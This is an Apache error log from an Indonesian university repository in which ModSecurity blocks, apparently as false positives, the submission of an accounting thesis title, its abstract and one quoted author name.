[Mon Aug 28 09:49:57.780195 2023] [:error] [pid 39813] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:title. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data:  \\x0d\\x0a( found within ARGS:title: PENGARUH KOMPETENSI DAN INDEPENDENSI\\x0d\\x0aAUDITOR TERHADAP KUALITAS AUDIT \\x0d\\x0aINTERNAL \\x0d\\x0a(Studi kasus pada PT. Progress Group Jakarta)  \\x0d\\x0a\\x0d\\x0a"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/admin/modules/bibliography/index.php"] [unique_id "ZOwLVcCo-f0AAJuFIzAAAAAE"]
[Mon Aug 28 09:49:57.902631 2023] [:error] [pid 39813] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:title. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data:  \\x0d\\x0a( found within ARGS:title: PENGARUH KOMPETENSI DAN INDEPENDENSI\\x0d\\x0aAUDITOR TERHADAP KUALITAS AUDIT \\x0d\\x0aINTERNAL \\x0d\\x0a(Studi kasus pada PT. Progress Group Jakarta)  \\x0d\\x0a\\x0d\\x0a"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/admin/modules/bibliography/index.php"] [unique_id "ZOwLVcCo-f0AAJuFIzEAAAAE"]
[Mon Aug 28 09:53:46.592604 2023] [:error] [pid 39578] [client 47.128.19.91] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:author: \\x22Stephens, Mia L\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repository.unla.ac.id"] [uri "/index.php"] [unique_id "ZOwMOsCo-f0AAJqaLYcAAAAN"]
[Mon Aug 28 09:57:05.082046 2023] [:error] [pid 39800] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:notes. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ) .  found within ARGS:notes: Eduardo, 2022. Pengaruh Kompetensi dan Independensi Auditor terhadap\\x0d\\x0aKualitas Audit Internal (Studi pada PT. Progress Group Jakarta) . Skripsi ini\\x0d\\x0aprogram studi Akuntansi Fakultas Ekonomi dan Bisnis Universitas\\x0d\\x0aLanglangbuana Bandung. Dibiming oleh pembimbing H. R. Hidayat dan Dudi\\x0d\\x0aHendaryan. Penelitian ini bertujuan untuk mengetahui dan menganalisis pengaruh\\x0d\\x0akomptensi dan independensi auditor terhadap kualitas audit internal p..."] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/admin/modules/bibliography/index.php"] [unique_id "ZOwNAcCo-f0AAJt4UKAAAAAP"]
[Mon Aug 28 09:57:05.622767 2023] [:error] [pid 39800] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:notes. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ) .  found within ARGS:notes: Eduardo, 2022. Pengaruh Kompetensi dan Independensi Auditor terhadap\\x0d\\x0aKualitas Audit Internal (Studi pada PT. Progress Group Jakarta) . Skripsi ini\\x0d\\x0aprogram studi Akuntansi Fakultas Ekonomi dan Bisnis Universitas\\x0d\\x0aLanglangbuana Bandung. Dibiming oleh pembimbing H. R. Hidayat dan Dudi\\x0d\\x0aHendaryan. Penelitian ini bertujuan untuk mengetahui dan menganalisis pengaruh\\x0d\\x0akomptensi dan independensi auditor terhadap kualitas audit internal p..."] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/admin/modules/bibliography/index.php"] [unique_id "ZOwNAcCo-f0AAJt4UKEAAAAP"]
[Mon Aug 28 09:57:06.325264 2023] [:error] [pid 39800] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:notes. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ) .  found within ARGS:notes: Eduardo, 2022. Pengaruh Kompetensi dan Independensi Auditor terhadap\\x0d\\x0aKualitas Audit Internal (Studi pada PT. Progress Group Jakarta) . Skripsi ini\\x0d\\x0aprogram studi Akuntansi Fakultas Ekonomi dan Bisnis Universitas\\x0d\\x0aLanglangbuana Bandung. Dibiming oleh pembimbing H. R. Hidayat dan Dudi\\x0d\\x0aHendaryan. Penelitian ini bertujuan untuk mengetahui dan menganalisis pengaruh\\x0d\\x0akomptensi dan independensi auditor terhadap kualitas audit internal p..."] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/admin/modules/bibliography/index.php"] [unique_id "ZOwNAsCo-f0AAJt4UKIAAAAP"]
[Mon Aug 28 09:57:06.790722 2023] [:error] [pid 39800] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:notes. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ) .  found within ARGS:notes: Eduardo, 2022. Pengaruh Kompetensi dan Independensi Auditor terhadap\\x0d\\x0aKualitas Audit Internal (Studi pada PT. Progress Group Jakarta) . Skripsi ini\\x0d\\x0aprogram studi Akuntansi Fakultas Ekonomi dan Bisnis Universitas\\x0d\\x0aLanglangbuana Bandung. Dibiming oleh pembimbing H. R. Hidayat dan Dudi\\x0d\\x0aHendaryan. Penelitian ini bertujuan untuk mengetahui dan menganalisis pengaruh\\x0d\\x0akomptensi dan independensi auditor terhadap kualitas audit internal p..."] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/admin/modules/bibliography/index.php"] [unique_id "ZOwNAsCo-f0AAJt4UKMAAAAP"]
[Mon Aug 28 09:57:07.045660 2023] [:error] [pid 39800] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:notes. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ) .  found within ARGS:notes: Eduardo, 2022. Pengaruh Kompetensi dan Independensi Auditor terhadap\\x0d\\x0aKualitas Audit Internal (Studi pada PT. Progress Group Jakarta) . Skripsi ini\\x0d\\x0aprogram studi Akuntansi Fakultas Ekonomi dan Bisnis Universitas\\x0d\\x0aLanglangbuana Bandung. Dibiming oleh pembimbing H. R. Hidayat dan Dudi\\x0d\\x0aHendaryan. Penelitian ini bertujuan untuk mengetahui dan menganalisis pengaruh\\x0d\\x0akomptensi dan independensi auditor terhadap kualitas audit internal p..."] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/admin/modules/bibliography/index.php"] [unique_id "ZOwNA8Co-f0AAJt4UKQAAAAP"]
[Mon Aug 28 09:57:07.237925 2023] [:error] [pid 39800] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:notes. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ) .  found within ARGS:notes: Eduardo, 2022. Pengaruh Kompetensi dan Independensi Auditor terhadap\\x0d\\x0aKualitas Audit Internal (Studi pada PT. Progress Group Jakarta) . Skripsi ini\\x0d\\x0aprogram studi Akuntansi Fakultas Ekonomi dan Bisnis Universitas\\x0d\\x0aLanglangbuana Bandung. Dibiming oleh pembimbing H. R. Hidayat dan Dudi\\x0d\\x0aHendaryan. Penelitian ini bertujuan untuk mengetahui dan menganalisis pengaruh\\x0d\\x0akomptensi dan independensi auditor terhadap kualitas audit internal p..."] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/admin/modules/bibliography/index.php"] [unique_id "ZOwNA8Co-f0AAJt4UKUAAAAP"]
[Mon Aug 28 09:57:07.430897 2023] [:error] [pid 39800] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:notes. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ) .  found within ARGS:notes: Eduardo, 2022. Pengaruh Kompetensi dan Independensi Auditor terhadap\\x0d\\x0aKualitas Audit Internal (Studi pada PT. Progress Group Jakarta) . Skripsi ini\\x0d\\x0aprogram studi Akuntansi Fakultas Ekonomi dan Bisnis Universitas\\x0d\\x0aLanglangbuana Bandung. Dibiming oleh pembimbing H. R. Hidayat dan Dudi\\x0d\\x0aHendaryan. Penelitian ini bertujuan untuk mengetahui dan menganalisis pengaruh\\x0d\\x0akomptensi dan independensi auditor terhadap kualitas audit internal p..."] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/admin/modules/bibliography/index.php"] [unique_id "ZOwNA8Co-f0AAJt4UKYAAAAP"]
[Mon Aug 28 09:57:11.591014 2023] [:error] [pid 39800] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:notes. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ) .  found within ARGS:notes: Eduardo, 2022. Pengaruh Kompetensi dan Independensi Auditor terhadap\\x0d\\x0aKualitas Audit Internal (Studi pada PT. Progress Group Jakarta) . Skripsi ini\\x0d\\x0aprogram studi Akuntansi Fakultas Ekonomi dan Bisnis Universitas\\x0d\\x0aLanglangbuana Bandung. Dibiming oleh pembimbing H. R. Hidayat dan Dudi\\x0d\\x0aHendaryan. Penelitian ini bertujuan untuk mengetahui dan menganalisis pengaruh\\x0d\\x0akomptensi dan independensi auditor terhadap kualitas audit internal p..."] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/admin/modules/bibliography/index.php"] [unique_id "ZOwNB8Co-f0AAJt4UKcAAAAP"]
[Mon Aug 28 09:57:12.013132 2023] [:error] [pid 39800] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:notes. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ) .  found within ARGS:notes: Eduardo, 2022. Pengaruh Kompetensi dan Independensi Auditor terhadap\\x0d\\x0aKualitas Audit Internal (Studi pada PT. Progress Group Jakarta) . Skripsi ini\\x0d\\x0aprogram studi Akuntansi Fakultas Ekonomi dan Bisnis Universitas\\x0d\\x0aLanglangbuana Bandung. Dibiming oleh pembimbing H. R. Hidayat dan Dudi\\x0d\\x0aHendaryan. Penelitian ini bertujuan untuk mengetahui dan menganalisis pengaruh\\x0d\\x0akomptensi dan independensi auditor terhadap kualitas audit internal p..."] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/admin/modules/bibliography/index.php"] [unique_id "ZOwNCMCo-f0AAJt4UKgAAAAP"]
[Mon Aug 28 09:57:12.199305 2023] [:error] [pid 39800] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:notes. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ) .  found within ARGS:notes: Eduardo, 2022. Pengaruh Kompetensi dan Independensi Auditor terhadap\\x0d\\x0aKualitas Audit Internal (Studi pada PT. Progress Group Jakarta) . Skripsi ini\\x0d\\x0aprogram studi Akuntansi Fakultas Ekonomi dan Bisnis Universitas\\x0d\\x0aLanglangbuana Bandung. Dibiming oleh pembimbing H. R. Hidayat dan Dudi\\x0d\\x0aHendaryan. Penelitian ini bertujuan untuk mengetahui dan menganalisis pengaruh\\x0d\\x0akomptensi dan independensi auditor terhadap kualitas audit internal p..."] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/admin/modules/bibliography/index.php"] [unique_id "ZOwNCMCo-f0AAJt4UKkAAAAP"]
[Mon Aug 28 09:57:12.358324 2023] [:error] [pid 39800] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:notes. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ) .  found within ARGS:notes: Eduardo, 2022. Pengaruh Kompetensi dan Independensi Auditor terhadap\\x0d\\x0aKualitas Audit Internal (Studi pada PT. Progress Group Jakarta) . Skripsi ini\\x0d\\x0aprogram studi Akuntansi Fakultas Ekonomi dan Bisnis Universitas\\x0d\\x0aLanglangbuana Bandung. Dibiming oleh pembimbing H. R. Hidayat dan Dudi\\x0d\\x0aHendaryan. Penelitian ini bertujuan untuk mengetahui dan menganalisis pengaruh\\x0d\\x0akomptensi dan independensi auditor terhadap kualitas audit internal p..."] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/admin/modules/bibliography/index.php"] [unique_id "ZOwNCMCo-f0AAJt4UKoAAAAP"]
[Mon Aug 28 09:57:12.517646 2023] [:error] [pid 39800] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:notes. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ) .  found within ARGS:notes: Eduardo, 2022. Pengaruh Kompetensi dan Independensi Auditor terhadap\\x0d\\x0aKualitas Audit Internal (Studi pada PT. Progress Group Jakarta) . Skripsi ini\\x0d\\x0aprogram studi Akuntansi Fakultas Ekonomi dan Bisnis Universitas\\x0d\\x0aLanglangbuana Bandung. Dibiming oleh pembimbing H. R. Hidayat dan Dudi\\x0d\\x0aHendaryan. Penelitian ini bertujuan untuk mengetahui dan menganalisis pengaruh\\x0d\\x0akomptensi dan independensi auditor terhadap kualitas audit internal p..."] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/admin/modules/bibliography/index.php"] [unique_id "ZOwNCMCo-f0AAJt4UKsAAAAP"]
[Mon Aug 28 09:57:12.701491 2023] [:error] [pid 39800] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:notes. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ) .  found within ARGS:notes: Eduardo, 2022. Pengaruh Kompetensi dan Independensi Auditor terhadap\\x0d\\x0aKualitas Audit Internal (Studi pada PT. Progress Group Jakarta) . Skripsi ini\\x0d\\x0aprogram studi Akuntansi Fakultas Ekonomi dan Bisnis Universitas\\x0d\\x0aLanglangbuana Bandung. Dibiming oleh pembimbing H. R. Hidayat dan Dudi\\x0d\\x0aHendaryan. Penelitian ini bertujuan untuk mengetahui dan menganalisis pengaruh\\x0d\\x0akomptensi dan independensi auditor terhadap kualitas audit internal p..."] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/admin/modules/bibliography/index.php"] [unique_id "ZOwNCMCo-f0AAJt4UKwAAAAP"]
[Mon Aug 28 09:57:12.884581 2023] [:error] [pid 39800] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:notes. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ) .  found within ARGS:notes: Eduardo, 2022. Pengaruh Kompetensi dan Independensi Auditor terhadap\\x0d\\x0aKualitas Audit Internal (Studi pada PT. Progress Group Jakarta) . Skripsi ini\\x0d\\x0aprogram studi Akuntansi Fakultas Ekonomi dan Bisnis Universitas\\x0d\\x0aLanglangbuana Bandung. Dibiming oleh pembimbing H. R. Hidayat dan Dudi\\x0d\\x0aHendaryan. Penelitian ini bertujuan untuk mengetahui dan menganalisis pengaruh\\x0d\\x0akomptensi dan independensi auditor terhadap kualitas audit internal p..."] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/admin/modules/bibliography/index.php"] [unique_id "ZOwNCMCo-f0AAJt4UK0AAAAP"]
[Mon Aug 28 09:57:13.078251 2023] [:error] [pid 39800] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:notes. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ) .  found within ARGS:notes: Eduardo, 2022. Pengaruh Kompetensi dan Independensi Auditor terhadap\\x0d\\x0aKualitas Audit Internal (Studi pada PT. Progress Group Jakarta) . Skripsi ini\\x0d\\x0aprogram studi Akuntansi Fakultas Ekonomi dan Bisnis Universitas\\x0d\\x0aLanglangbuana Bandung. Dibiming oleh pembimbing H. R. Hidayat dan Dudi\\x0d\\x0aHendaryan. Penelitian ini bertujuan untuk mengetahui dan menganalisis pengaruh\\x0d\\x0akomptensi dan independensi auditor terhadap kualitas audit internal p..."] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/admin/modules/bibliography/index.php"] [unique_id "ZOwNCcCo-f0AAJt4UK4AAAAP"]
[Mon Aug 28 09:57:13.270263 2023] [:error] [pid 39800] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:notes. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ) .  found within ARGS:notes: Eduardo, 2022. Pengaruh Kompetensi dan Independensi Auditor terhadap\\x0d\\x0aKualitas Audit Internal (Studi pada PT. Progress Group Jakarta) . Skripsi ini\\x0d\\x0aprogram studi Akuntansi Fakultas Ekonomi dan Bisnis Universitas\\x0d\\x0aLanglangbuana Bandung. Dibiming oleh pembimbing H. R. Hidayat dan Dudi\\x0d\\x0aHendaryan. Penelitian ini bertujuan untuk mengetahui dan menganalisis pengaruh\\x0d\\x0akomptensi dan independensi auditor terhadap kualitas audit internal p..."] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/admin/modules/bibliography/index.php"] [unique_id "ZOwNCcCo-f0AAJt4UK8AAAAP"]
[Mon Aug 28 09:57:13.460814 2023] [:error] [pid 39800] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:notes. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ) .  found within ARGS:notes: Eduardo, 2022. Pengaruh Kompetensi dan Independensi Auditor terhadap\\x0d\\x0aKualitas Audit Internal (Studi pada PT. Progress Group Jakarta) . Skripsi ini\\x0d\\x0aprogram studi Akuntansi Fakultas Ekonomi dan Bisnis Universitas\\x0d\\x0aLanglangbuana Bandung. Dibiming oleh pembimbing H. R. Hidayat dan Dudi\\x0d\\x0aHendaryan. Penelitian ini bertujuan untuk mengetahui dan menganalisis pengaruh\\x0d\\x0akomptensi dan independensi auditor terhadap kualitas audit internal p..."] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/admin/modules/bibliography/index.php"] [unique_id "ZOwNCcCo-f0AAJt4ULAAAAAP"]
[Mon Aug 28 09:57:13.638160 2023] [:error] [pid 39800] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:notes. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ) .  found within ARGS:notes: Eduardo, 2022. Pengaruh Kompetensi dan Independensi Auditor terhadap\\x0d\\x0aKualitas Audit Internal (Studi pada PT. Progress Group Jakarta) . Skripsi ini\\x0d\\x0aprogram studi Akuntansi Fakultas Ekonomi dan Bisnis Universitas\\x0d\\x0aLanglangbuana Bandung. Dibiming oleh pembimbing H. R. Hidayat dan Dudi\\x0d\\x0aHendaryan. Penelitian ini bertujuan untuk mengetahui dan menganalisis pengaruh\\x0d\\x0akomptensi dan independensi auditor terhadap kualitas audit internal p..."] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/admin/modules/bibliography/index.php"] [unique_id "ZOwNCcCo-f0AAJt4ULEAAAAP"]
[Mon Aug 28 09:57:13.806936 2023] [:error] [pid 39800] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:notes. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ) .  found within ARGS:notes: Eduardo, 2022. Pengaruh Kompetensi dan Independensi Auditor terhadap\\x0d\\x0aKualitas Audit Internal (Studi pada PT. Progress Group Jakarta) . Skripsi ini\\x0d\\x0aprogram studi Akuntansi Fakultas Ekonomi dan Bisnis Universitas\\x0d\\x0aLanglangbuana Bandung. Dibiming oleh pembimbing H. R. Hidayat dan Dudi\\x0d\\x0aHendaryan. Penelitian ini bertujuan untuk mengetahui dan menganalisis pengaruh\\x0d\\x0akomptensi dan independensi auditor terhadap kualitas audit internal p..."] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/admin/modules/bibliography/index.php"] [unique_id "ZOwNCcCo-f0AAJt4ULIAAAAP"]
[Mon Aug 28 09:57:13.974980 2023] [:error] [pid 39800] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:notes. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ) .  found within ARGS:notes: Eduardo, 2022. Pengaruh Kompetensi dan Independensi Auditor terhadap\\x0d\\x0aKualitas Audit Internal (Studi pada PT. Progress Group Jakarta) . Skripsi ini\\x0d\\x0aprogram studi Akuntansi Fakultas Ekonomi dan Bisnis Universitas\\x0d\\x0aLanglangbuana Bandung. Dibiming oleh pembimbing H. R. Hidayat dan Dudi\\x0d\\x0aHendaryan. Penelitian ini bertujuan untuk mengetahui dan menganalisis pengaruh\\x0d\\x0akomptensi dan independensi auditor terhadap kualitas audit internal p..."] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/admin/modules/bibliography/index.php"] [unique_id "ZOwNCcCo-f0AAJt4ULMAAAAP"]
[Mon Aug 28 09:57:14.158644 2023] [:error] [pid 39800] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:notes. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ) .  found within ARGS:notes: Eduardo, 2022. Pengaruh Kompetensi dan Independensi Auditor terhadap\\x0d\\x0aKualitas Audit Internal (Studi pada PT. Progress Group Jakarta) . Skripsi ini\\x0d\\x0aprogram studi Akuntansi Fakultas Ekonomi dan Bisnis Universitas\\x0d\\x0aLanglangbuana Bandung. Dibiming oleh pembimbing H. R. Hidayat dan Dudi\\x0d\\x0aHendaryan. Penelitian ini bertujuan untuk mengetahui dan menganalisis pengaruh\\x0d\\x0akomptensi dan independensi auditor terhadap kualitas audit internal p..."] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/admin/modules/bibliography/index.php"] [unique_id "ZOwNCsCo-f0AAJt4ULQAAAAP"]
[Mon Aug 28 09:57:14.322829 2023] [:error] [pid 39800] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:notes. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ) .  found within ARGS:notes: Eduardo, 2022. Pengaruh Kompetensi dan Independensi Auditor terhadap\\x0d\\x0aKualitas Audit Internal (Studi pada PT. Progress Group Jakarta) . Skripsi ini\\x0d\\x0aprogram studi Akuntansi Fakultas Ekonomi dan Bisnis Universitas\\x0d\\x0aLanglangbuana Bandung. Dibiming oleh pembimbing H. R. Hidayat dan Dudi\\x0d\\x0aHendaryan. Penelitian ini bertujuan untuk mengetahui dan menganalisis pengaruh\\x0d\\x0akomptensi dan independensi auditor terhadap kualitas audit internal p..."] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/admin/modules/bibliography/index.php"] [unique_id "ZOwNCsCo-f0AAJt4ULUAAAAP"]
[Mon Aug 28 09:57:14.485403 2023] [:error] [pid 39800] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:notes. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ) .  found within ARGS:notes: Eduardo, 2022. Pengaruh Kompetensi dan Independensi Auditor terhadap\\x0d\\x0aKualitas Audit Internal (Studi pada PT. Progress Group Jakarta) . Skripsi ini\\x0d\\x0aprogram studi Akuntansi Fakultas Ekonomi dan Bisnis Universitas\\x0d\\x0aLanglangbuana Bandung. Dibiming oleh pembimbing H. R. Hidayat dan Dudi\\x0d\\x0aHendaryan. Penelitian ini bertujuan untuk mengetahui dan menganalisis pengaruh\\x0d\\x0akomptensi dan independensi auditor terhadap kualitas audit internal p..."] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/admin/modules/bibliography/index.php"] [unique_id "ZOwNCsCo-f0AAJt4ULYAAAAP"]
